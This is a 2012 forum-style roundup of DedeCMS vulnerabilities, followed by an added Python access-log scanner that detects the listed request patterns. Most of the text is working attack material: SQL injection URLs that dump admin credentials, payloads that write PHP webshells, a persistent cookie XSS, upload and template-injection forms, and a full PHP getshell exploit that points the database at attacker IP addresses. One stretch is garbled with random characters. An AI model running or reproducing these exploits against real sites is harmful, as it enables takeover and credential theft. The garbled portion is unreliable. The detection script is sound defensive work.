
DedeCMS vulnerability roundup

Posted 2012-10-18 10:42:14
DedeCMS 5.6 rss.php SQL injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCMS v5.6 embedded malicious code execution vulnerability
Register as a member and upload a piece of software. In the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This variant writes x.php with password xiao, a one-line shell generated directly.

DedeCMS 5.6 GBK SQL injection vulnerability

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DedeCMS (all versions) gotopage parameter XSS vulnerability
1. Copy the URL below into the browser and open it. It triggers the XSS and installs the XSS "rootkit". Note that IE8/9 block URL-based XSS, so their XSS filter must be turned off.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser. Afterwards, no matter how you visit either of the URLs below, our XSS fires.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DedeCMS variable overwrite getshell
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache   aid=2 shellpath= /   aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=isset($argv[3]) ? $argv[3] : '';
$exp=Getshell($url,$aid,$path);
// Getshell() returns the HTTP status line; in "HTTP/1.1 200 OK" the "OK" sits at offset 13.
if (strpos($exp,"OK")>12){
echo "Exploit Success \n";
if($aid==1)echo "Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "Exploit Failed \n";
}

// Posts the variable-overwrite body to plus/mytag_js.php: the _COOKIE[GLOBALS][cfg_db*]
// fields repoint the database connection at an attacker-controlled MySQL server.
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "No response from ".$host."\n";
return '';
}
fwrite($ock,$data);
$exp=fgets($ock, 1024);   // only the status line is needed
fclose($ock);
return $exp;
}
?>

DedeCMS v5.6-5.7 unauthorized access vulnerability (straight into the admin backend)

http://www.ssvdb.com/<backend-dir>/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Replace validate=dcug above with the current captcha value and you are taken straight into the site backend.

Prerequisite: you must first obtain the backend path.

DedeCMS tag remote file write vulnerability
Precondition: you need your own DedeCMS database ready, with this row inserted:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit the form below; the shell lands as 1.php in the same directory. Work out the mechanism yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="Submit" name="QuickSearchBtn"><br />
</form>
<script>
// Point the form at the target mytag_js.php URL typed into the first field before submitting.
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

DedeCMS <= V5.6 Final template execution vulnerability
1. Register a user, go into the member area, publish an article and upload an image. Then, in attachment management, replace the image with our crafted template. Say the image is named:
uploads/userup/2/12OMX04-15A.jpg

The template content (prefix it with GIF89a if the image format is checked):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article you just published, view the page source, and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>

<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(comma separated)

<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>Category:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test category</option>
</select> <span style="color:#F00">*</span>(coloured categories cannot be selected)

<label>My category:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(brief description of the content)

<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(this is the crafted part)
</div>

<!-- form action area -->
<h3 class="meTitle">Body</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="&lt;div&gt;&lt;a href=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; alt=&quot;&quot; src=&quot;http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg&quot; width=&quot;1010&quot; height=&quot;456&quot; /&gt;&lt;/a&gt;&lt;/div&gt; &lt;p&gt;&lt;?phpinfo()?&gt;1111111&lt;/p&gt;" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>Captcha:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="Can't read it? Click to refresh" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>

</div>

</form>

Submit. If it reports that the edit succeeded, we have changed the template path.
3. Visit the edited article. Assuming its aid is 2, just request:

http://127.0.0.1/dede/plus/view.php?aid=2

and the webshell 1.php is generated in the plus directory.

DedeCMS Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif.
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit">Change</button>
</form>

Build the form above; after the upload the image is stored as /uploads/userup/3/1.gif.
Publish an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>aa</option>
</select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">Submit</button>
</form>

DedeCMS V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

' a2 d* ~& k8 |
* Q7 y! k* F, H: f$ S/ c' e" D
# ~/ e; G; a& H" ~0 C; ^3 D
1 s- b  d% i' n: L& ^! b
) _. b! F2 b. C
$ k1 ?! G) Z  e8 v6 ]& x; X0 L9 n4 U3 V5 g, d2 F. T9 [: \9 O' c
* ~# _* O% [* O/ u- z

4 o* p- [5 |( w) B3 H( g, c3 X8 ~# Y/ `9 T3 [! R% r5 j
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 " g9 F  {2 O! Z4 x9 N! l  {6 G
http://www.test.com/plus/carbuya ... urn&code=../../
; K" q- J1 I! v
7 v' A! W4 ^" x. X& {7 |, g+ W8 X9 K1 f
4 `$ p# q6 p; s9 G+ L% [! y! i

( N8 J. c: X# ?  }1 a: c
- x% ?, U- m5 ]
5 [, v/ g& J, c. H2 [  Q: d1 `: f* k( u
7 r8 v/ e' p. X; m' I( X: W
' z, i, q$ l/ S

' I( t7 @9 y2 J0 M- m  @DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
0 h2 z5 s& A, n; {4 R9 a% n0 \plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`& ^, v, b; V/ T
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5

DedeCMS 5.1 feedback_js.php SQL injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

DedeCMS select_soft_post.php uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t ---------- <br /><br />
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method="POST" enctype="multipart/form-data" name="myform">
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='OK' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game, get a webshell at /data/cache/fly.php...<br />
</body>
</html>

DedeCMS 5.3 - 5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL numeric-overflow error together with the fact that DedeCMS records database error messages in a PHP file whose header is never validated.
1. Visit the URL:

http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>

and you can see the error message.

2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following proves the injection succeeded:
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Open test.html from dede.rar; note that the form's action address is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After clicking OK, seeing the step-2 output means the trojan file was uploaded successfully.

DedeCMS plus/infosearch.php SQL injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
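The request shapes collected in this post are also what a defender looks for after the fact. The following Python scanner is an added example, not part of the original post and not DedeCMS code: it walks Common Log Format access-log lines, URL-decodes each request target (tolerating one level of double encoding) and flags the patterns listed above, such as `_COOKIE[GLOBALS]`/`_POST[GLOBALS]` variable overwrite, the raw `sql=` parameter of plus/advancedsearch.php, the `_Cs[` array of plus/rss.php, the `gotopage` XSS, the traversal delete in member/edit_face.php, the `code=../` inclusion in plus/carbuyaction.php, UNION injections against plus/feedback_js.php and plus/infosearch.php, and PHP written into mysql_error_trace.php via plus/digg_frame.php. The rule names, severities, the hypothetical IP addresses and the log lines are constructed sample data. POST bodies never reach the access log, so the body-driven attacks (the mytag_js.php cookie overwrite and the select_soft_post.php upload) can only be spotted by the script they target and are rated informational.

```python
"""Flag the DedeCMS request patterns from this roundup in web-server access logs.

Added example, not part of the original post or of DedeCMS: the rules below are
written from the exploit URLs listed above. The log lines at the bottom are
constructed sample data, not a real capture.
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Common Log Format: client ident user [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is matched against the URL-decoded request path and query string.
# POST bodies never reach the access log, so the body-driven exploits in the
# roundup (mytag_js.php cookie overwrite, select_soft_post.php upload) can only
# be spotted by the script they target; those rules are rated "info".
RULES = [
    ("high", "GLOBALS variable overwrite via request array",
     re.compile(r'_(?:COOKIE|POST|GET|REQUEST)\[GLOBALS\]|[?&]GLOBALS\[', re.I)),
    ("high", "advancedsearch.php raw sql parameter",
     re.compile(r'/plus/advancedsearch\.php\?.*\bsql=', re.I)),
    ("high", "rss.php _Cs array injection",
     re.compile(r'/plus/rss\.php\?.*_Cs\[', re.I)),
    ("high", "member/index.php uid quote injection",
     re.compile(r"/member/index\.php\?.*\buid=[^&]*'", re.I)),
    ("high", "login.php gotopage reflected XSS",
     re.compile(r'/login\.php\?.*gotopage=[^&]*(?:<|javascript:)', re.I)),
    ("high", "edit_face.php traversal delete",
     re.compile(r'/member/edit_face\.php\?.*dopost=delold.*\.\./', re.I)),
    ("high", "carbuyaction.php local file inclusion",
     re.compile(r'/plus/carbuyaction\.php\?.*\bcode=[^&]*\.\./', re.I)),
    ("high", "feedback_js.php / infosearch.php UNION injection",
     re.compile(r'/plus/(?:feedback_js|infosearch)\.php\?.*\bunion\b.*\bselect\b', re.I)),
    ("high", "digg_frame.php PHP written into error log",
     re.compile(r'/plus/digg_frame\.php\?.*(?:<\?|\?>|eval\s*\()', re.I)),
    ("info", "mytag_js.php / select_soft_post.php requested",
     re.compile(r'/plus/mytag_js\.php|/include/dialog/select_soft_post\.php', re.I)),
]


def decode(path, rounds=2):
    """URL-decode the request target, tolerating one level of double encoding."""
    for _ in range(rounds):
        decoded = unquote_plus(path)
        if decoded == path:
            break
        path = decoded
    return path


def scan_line(line):
    """Return a list of alert dicts for one log line, or None if it is not CLF."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = decode(m.group("path"))
    return [
        {"ip": m.group("ip"), "ts": m.group("ts"), "severity": sev,
         "rule": name, "path": m.group("path")}
        for sev, name, rx in RULES if rx.search(target)
    ]


def scan(lines):
    """Run every rule over every parsable line and return all alerts in log order."""
    alerts = []
    for line in lines:
        hits = scan_line(line)
        if hits:
            alerts.extend(hits)
    return alerts


def high_by_ip(alerts):
    """Count high-severity alerts per client address (the pivot for triage)."""
    return Counter(a["ip"] for a in alerts if a["severity"] == "high")


# Constructed sample log: five exploit-shaped requests, one benign page view,
# one ambiguous hit on mytag_js.php (legitimately requested by normal pages).
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Oct/2012:10:42:01 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 1532',
    '203.0.113.5 - - [18/Oct/2012:10:42:07 +0800] "GET /dede/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=198.51.100.9 HTTP/1.1" 302 0',
    '198.51.100.7 - - [18/Oct/2012:10:43:11 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 88',
    '198.51.100.7 - - [18/Oct/2012:10:43:20 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2201',
    '192.0.2.44 - - [18/Oct/2012:10:44:00 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 9021',
    '192.0.2.44 - - [18/Oct/2012:10:44:02 +0800] "GET /plus/mytag_js.php?aid=1 HTTP/1.1" 200 312',
    '192.0.2.45 - - [18/Oct/2012:10:45:13 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml(1,1,1)%23%27][0]=1 HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f'{a["severity"]:4} {a["ip"]:15} {a["rule"]}: {a["path"]}')
    print("high-severity hits per IP:", dict(high_by_ip(scan(SAMPLE_LOG))))
```

Run it against a real log by replacing SAMPLE_LOG with the lines of the access log; status codes are kept in the parse so a follow-up can separate attempts (4xx/5xx) from likely successes (200/302), and the per-IP counter gives the first pivot for incident triage. The "info" rule will fire on every normal page that includes plus/mytag_js.php, so treat it as context for a high-severity hit from the same address rather than as an alert on its own.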